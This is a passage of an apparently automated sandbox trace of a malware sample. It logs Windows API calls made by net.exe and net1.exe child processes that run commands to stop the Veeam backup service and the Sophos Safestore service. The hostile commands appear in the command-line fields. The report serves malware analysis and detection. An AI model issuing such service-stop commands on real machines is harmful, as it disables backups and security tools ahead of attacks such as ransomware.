_String2="VeeamBackupSvc") returned -3 [0207.976] _wcsicmp (_String1="stats", _String2="VeeamBackupSvc") returned -3 [0207.976] _wcsicmp (_String1="statistics", _String2="VeeamBackupSvc") returned -3 [0207.976] _wcsicmp (_String1="stop", _String2="VeeamBackupSvc") returned -3 [0207.976] _wcsicmp (_String1="time", _String2="VeeamBackupSvc") returned -2 [0207.976] _wcsicmp (_String1="user", _String2="VeeamBackupSvc") returned -1 [0207.976] _wcsicmp (_String1="users", _String2="VeeamBackupSvc") returned -1 [0207.976] _wcsicmp (_String1="msg", _String2="VeeamBackupSvc") returned -9 [0207.976] _wcsicmp (_String1="messenger", _String2="VeeamBackupSvc") returned -9 [0207.976] _wcsicmp (_String1="receiver", _String2="VeeamBackupSvc") returned -4 [0207.976] _wcsicmp (_String1="rcv", _String2="VeeamBackupSvc") returned -4 [0207.976] _wcsicmp (_String1="netpopup", _String2="VeeamBackupSvc") returned -8 [0207.976] _wcsicmp (_String1="redirector", _String2="VeeamBackupSvc") returned -4 [0207.976] _wcsicmp (_String1="redir", _String2="VeeamBackupSvc") returned -4 [0207.976] _wcsicmp (_String1="rdr", _String2="VeeamBackupSvc") returned -4 [0207.976] _wcsicmp (_String1="workstation", _String2="VeeamBackupSvc") returned 1 [0207.976] _wcsicmp (_String1="work", _String2="VeeamBackupSvc") returned 1 [0207.977] _wcsicmp (_String1="wksta", _String2="VeeamBackupSvc") returned 1 [0207.977] _wcsicmp (_String1="prdr", _String2="VeeamBackupSvc") returned -6 [0207.977] _wcsicmp (_String1="devrdr", _String2="VeeamBackupSvc") returned -18 [0207.977] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamBackupSvc") returned -10 [0207.977] _wcsicmp (_String1="server", _String2="VeeamBackupSvc") returned -3 [0207.977] _wcsicmp (_String1="svr", _String2="VeeamBackupSvc") returned -3 [0207.977] _wcsicmp (_String1="srv", _String2="VeeamBackupSvc") returned -3 [0207.977] _wcsicmp (_String1="lanmanserver", _String2="VeeamBackupSvc") returned -10 [0207.977] _wcsicmp (_String1="alerter", _String2="VeeamBackupSvc") returned -21 [0207.977] _wcsicmp (_String1="netlogon", _String2="VeeamBackupSvc") returned -8 [0207.977] _wcsupr (in: _String="VeeamBackupSvc" | out: _String="VEEAMBACKUPSVC") returned="VEEAMBACKUPSVC" [0207.977] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7954d8 [0207.979] GetServiceKeyNameW (in: hSCManager=0x7954d8, lpDisplayName="VEEAMBACKUPSVC", lpServiceName=0xddaaf0, lpcchBuffer=0x31fa40 | out: lpServiceName="", lpcchBuffer=0x31fa40) returned 0 [0207.980] _wcsicmp (_String1="msg", _String2="VEEAMBACKUPSVC") returned -9 [0207.980] _wcsicmp (_String1="messenger", _String2="VEEAMBACKUPSVC") returned -9 [0207.980] _wcsicmp (_String1="receiver", _String2="VEEAMBACKUPSVC") returned -4 [0207.980] _wcsicmp (_String1="rcv", _String2="VEEAMBACKUPSVC") returned -4 [0207.980] _wcsicmp (_String1="redirector", _String2="VEEAMBACKUPSVC") returned -4 [0207.980] _wcsicmp (_String1="redir", _String2="VEEAMBACKUPSVC") returned -4 [0207.980] _wcsicmp (_String1="rdr", _String2="VEEAMBACKUPSVC") returned -4 [0207.980] _wcsicmp (_String1="workstation", _String2="VEEAMBACKUPSVC") returned 1 [0207.980] _wcsicmp (_String1="work", _String2="VEEAMBACKUPSVC") returned 1 [0207.980] _wcsicmp (_String1="wksta", _String2="VEEAMBACKUPSVC") returned 1 [0207.980] _wcsicmp (_String1="prdr", _String2="VEEAMBACKUPSVC") returned -6 [0207.980] _wcsicmp (_String1="devrdr", _String2="VEEAMBACKUPSVC") returned -18 [0207.980] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMBACKUPSVC") returned -10 [0207.980] _wcsicmp (_String1="server", _String2="VEEAMBACKUPSVC") returned -3 [0207.980] _wcsicmp (_String1="svr", _String2="VEEAMBACKUPSVC") returned -3 [0207.980] _wcsicmp (_String1="srv", _String2="VEEAMBACKUPSVC") returned -3 [0207.980] _wcsicmp (_String1="lanmanserver", _String2="VEEAMBACKUPSVC") returned -10 [0207.980] _wcsicmp (_String1="alerter", _String2="VEEAMBACKUPSVC") returned -21 [0207.980] _wcsicmp (_String1="netlogon", _String2="VEEAMBACKUPSVC") returned -8 [0207.980] NetServiceControl (in: servername=0x0, service="VEEAMBACKUPSVC", opcode=0x0, arg=0x0, bufptr=0x31fa3c | out: bufptr=0x31fa3c) returned 0x889 [0207.981] wcscpy_s (in: _Destination=0xdda4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0207.981] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0207.982] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xddb338, nSize=0x800, Arguments=0xdd9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0207.983] GetFileType (hFile=0x26c) returned 0x3 [0207.983] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x794008 [0207.983] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x794008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0207.983] WriteFile (in: hFile=0x26c, lpBuffer=0x794008, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x31f97c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f97c, lpOverlapped=0x0) returned 0 [0207.983] LocalFree (hMem=0x794008) returned 0x0 [0207.983] GetFileType (hFile=0x26c) returned 0x3 [0207.983] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7962b0 [0207.983] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7962b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ny", lpUsedDefaultChar=0x0) returned 2 [0207.983] WriteFile (in: hFile=0x26c, lpBuffer=0x7962b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f97c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f97c, lpOverlapped=0x0) returned 0 [0207.983] LocalFree (hMem=0x7962b0) returned 0x0 [0207.984] _ultow (in: _Dest=0x889, _Radix=3275180 | out: _Dest=0x889) returned="2185" [0207.984] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xddb338, nSize=0x800, Arguments=0xdd9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0207.984] GetFileType (hFile=0x26c) returned 0x3 [0207.984] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7962b0 [0207.984] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7962b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0207.984] WriteFile (in: hFile=0x26c, lpBuffer=0x7962b0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x31f988, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f988, lpOverlapped=0x0) returned 0 [0207.984] LocalFree (hMem=0x7962b0) returned 0x0 [0207.984] GetFileType (hFile=0x26c) returned 0x3 [0207.984] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7962b0 [0207.984] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7962b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ny", lpUsedDefaultChar=0x0) returned 2 [0207.984] WriteFile (in: hFile=0x26c, lpBuffer=0x7962b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f988, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f988, lpOverlapped=0x0) returned 0 [0207.984] LocalFree (hMem=0x7962b0) returned 0x0 [0207.984] NetApiBufferFree (Buffer=0x791c78) returned 0x0 [0207.985] NetApiBufferFree (Buffer=0x791c90) returned 0x0 [0207.985] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBackupSvc /y" [0207.985] exit (_Code=2) Process: id = "256" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4f344000" os_pid = "0x8e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos Safestore ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 429 os_tid = 0x33c Process: id = "257" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4a229000" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "256" os_parent_pid = "0x8e0" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Safestore ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 430 os_tid = 0x954 [0208.122] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fd7c | out: lpSystemTimeAsFileTime=0x31fd7c*(dwLowDateTime=0x453c50a0, dwHighDateTime=0x1d57a87)) [0208.122] GetCurrentProcessId () returned 0x828 [0208.122] GetCurrentThreadId () returned 0x954 [0208.122] GetTickCount () returned 0x116da1a [0208.122] QueryPerformanceCounter (in: lpPerformanceCount=0x31fd74 | out: lpPerformanceCount=0x31fd74*=32840701294) returned 1 [0208.123] GetModuleHandleA (lpModuleName=0x0) returned 0xb40000 [0208.123] __set_app_type (_Type=0x1) [0208.123] __p__fmode () returned 0x74eb31f4 [0208.123] __p__commode () returned 0x74eb31fc [0208.123] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb4ffe6) returned 0x0 [0208.123] __getmainargs (in: _Argc=0xb59064, _Argv=0xb5906c, _Env=0xb59068, _DoWildCard=0, _StartInfo=0xb59024 | out: _Argc=0xb59064, _Argv=0xb5906c, _Env=0xb59068) returned 0 [0208.123] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.123] GetConsoleOutputCP () returned 0x1b5 [0208.123] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb59080 | out: lpCPInfo=0xb59080) returned 1 [0208.123] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.126] sprintf_s (in: _DstBuf=0x31fd34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0208.126] setlocale (category=0, locale=".437") returned="English_United States.437" [0208.128] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0208.128] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0208.128] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Safestore ServiceΓÇ¥ /y" [0208.128] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31fb00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0208.128] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x98) returned 0x733c48 [0208.128] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0208.129] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31fd04 | out: Buffer=0x31fd04*=0x731ca8) returned 0x0 [0208.129] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31fd04 | out: Buffer=0x31fd04*=0x731cc0) returned 0x0 [0208.129] _fileno (_File=0x74eb2900) returned -2 [0208.129] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0208.129] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0208.129] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0208.129] _wcsicmp (_String1="config", _String2="stop") returned -16 [0208.129] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0208.129] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0208.129] _wcsicmp (_String1="file", _String2="stop") returned -13 [0208.129] _wcsicmp (_String1="files", _String2="stop") returned -13 [0208.129] _wcsicmp (_String1="group", _String2="stop") returned -12 [0208.129] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0208.129] _wcsicmp (_String1="help", _String2="stop") returned -11 [0208.129] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0208.129] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0208.129] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0208.129] _wcsicmp (_String1="session", _String2="stop") returned -15 [0208.129] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0208.129] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0208.129] _wcsicmp (_String1="share", _String2="stop") returned -12 [0208.129] _wcsicmp (_String1="start", _String2="stop") returned -14 [0208.129] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0208.129] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0208.129] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0208.129] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0208.130] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0208.130] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0208.130] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0208.130] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0208.130] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0208.130] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0208.130] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0208.130] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0208.130] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0208.130] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0208.130] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0208.130] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0208.130] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0208.130] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0208.130] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0208.130] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0208.130] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0208.130] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0208.130] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0208.130] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0208.130] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0208.130] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0208.130] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0208.130] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0208.130] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0208.130] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0208.130] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0208.130] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0208.130] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0208.130] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0208.130] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0208.130] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0208.130] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0208.130] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0208.131] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0208.131] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0208.131] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0208.131] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0208.131] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0208.131] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0208.131] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0208.131] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0208.131] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0208.131] _wcsicmp (_String1="accounts", _String2="Safestore") returned -18 [0208.131] _wcsicmp (_String1="computer", _String2="Safestore") returned -16 [0208.131] _wcsicmp (_String1="config", _String2="Safestore") returned -16 [0208.131] _wcsicmp (_String1="continue", _String2="Safestore") returned -16 [0208.131] _wcsicmp (_String1="cont", _String2="Safestore") returned -16 [0208.131] _wcsicmp (_String1="file", _String2="Safestore") returned -13 [0208.131] _wcsicmp (_String1="files", _String2="Safestore") returned -13 [0208.131] _wcsicmp (_String1="group", _String2="Safestore") returned -12 [0208.131] _wcsicmp (_String1="groups", _String2="Safestore") returned -12 [0208.131] _wcsicmp (_String1="help", _String2="Safestore") returned -11 [0208.131] _wcsicmp (_String1="helpmsg", _String2="Safestore") returned -11 [0208.131] _wcsicmp (_String1="localgroup", _String2="Safestore") returned -7 [0208.131] _wcsicmp (_String1="pause", _String2="Safestore") returned -3 [0208.131] _wcsicmp (_String1="session", _String2="Safestore") returned 4 [0208.131] _wcsicmp (_String1="sessions", _String2="Safestore") returned 4 [0208.131] _wcsicmp (_String1="sess", _String2="Safestore") returned 4 [0208.131] _wcsicmp (_String1="share", _String2="Safestore") returned 7 [0208.131] _wcsicmp (_String1="start", _String2="Safestore") returned 19 [0208.131] _wcsicmp (_String1="stats", _String2="Safestore") returned 19 [0208.131] _wcsicmp (_String1="statistics", _String2="Safestore") returned 19 [0208.131] _wcsicmp (_String1="stop", _String2="Safestore") returned 19 [0208.131] _wcsicmp (_String1="time", _String2="Safestore") returned 1 [0208.132] _wcsicmp (_String1="user", _String2="Safestore") returned 2 [0208.132] _wcsicmp (_String1="users", _String2="Safestore") returned 2 [0208.132] _wcsicmp (_String1="msg", _String2="Safestore") returned -6 [0208.132] _wcsicmp (_String1="messenger", _String2="Safestore") returned -6 [0208.132] _wcsicmp (_String1="receiver", _String2="Safestore") returned -1 [0208.132] _wcsicmp (_String1="rcv", _String2="Safestore") returned -1 [0208.132] _wcsicmp (_String1="netpopup", _String2="Safestore") returned -5 [0208.132] _wcsicmp (_String1="redirector", _String2="Safestore") returned -1 [0208.132] _wcsicmp (_String1="redir", _String2="Safestore") returned -1 [0208.132] _wcsicmp (_String1="rdr", _String2="Safestore") returned -1 [0208.132] _wcsicmp (_String1="workstation", _String2="Safestore") returned 4 [0208.132] _wcsicmp (_String1="work", _String2="Safestore") returned 4 [0208.132] _wcsicmp (_String1="wksta", _String2="Safestore") returned 4 [0208.132] _wcsicmp (_String1="prdr", _String2="Safestore") returned -3 [0208.132] _wcsicmp (_String1="devrdr", _String2="Safestore") returned -15 [0208.132] _wcsicmp (_String1="lanmanworkstation", _String2="Safestore") returned -7 [0208.132] _wcsicmp (_String1="server", _String2="Safestore") returned 4 [0208.132] _wcsicmp (_String1="svr", _String2="Safestore") returned 21 [0208.132] _wcsicmp (_String1="srv", _String2="Safestore") returned 17 [0208.132] _wcsicmp (_String1="lanmanserver", _String2="Safestore") returned -7 [0208.132] _wcsicmp (_String1="alerter", _String2="Safestore") returned -18 [0208.132] _wcsicmp (_String1="netlogon", _String2="Safestore") returned -5 [0208.132] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0208.132] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.133] wcscpy_s (in: _Destination=0x31f804, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0208.133] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a80000 [0208.133] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x31f800, nSize=0x0, Arguments=0x31f7fc | out: lpBuffer="噘sneth.dll") returned 0xff [0208.135] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0208.135] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0208.135] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0208.135] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0208.135] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0208.135] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0208.135] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0208.135] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0208.135] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0208.135] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0208.135] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.135] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0208.135] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0208.135] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0208.135] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0208.135] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0208.135] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0208.135] _wcsicmp (_String1="CONT", _String2="Safestore") returned -16 [0208.135] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0208.135] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.135] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0208.135] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.135] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0208.135] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0208.135] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0208.135] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0208.135] _wcsicmp (_String1="FILES", _String2="Safestore") returned -13 [0208.135] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0208.136] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.136] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0208.136] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.136] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0208.136] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0208.136] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0208.136] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0208.136] _wcsicmp (_String1="GROUPS", _String2="Safestore") returned -12 [0208.136] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0208.136] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.136] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0208.136] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.136] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0208.136] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0208.136] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0208.136] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0208.136] _wcsicmp (_String1="REPL", _String2="Safestore") returned -1 [0208.136] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0208.136] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0208.136] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0208.136] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0208.136] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0208.136] _wcsicmp (_String1="REPLICATOR", _String2="Safestore") returned -1 [0208.136] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0208.136] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.136] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0208.136] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.136] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0208.136] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0208.136] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0208.136] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0208.136] _wcsicmp (_String1="SESSIONS", _String2="Safestore") returned 4 [0208.136] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0208.136] wcstok (in: 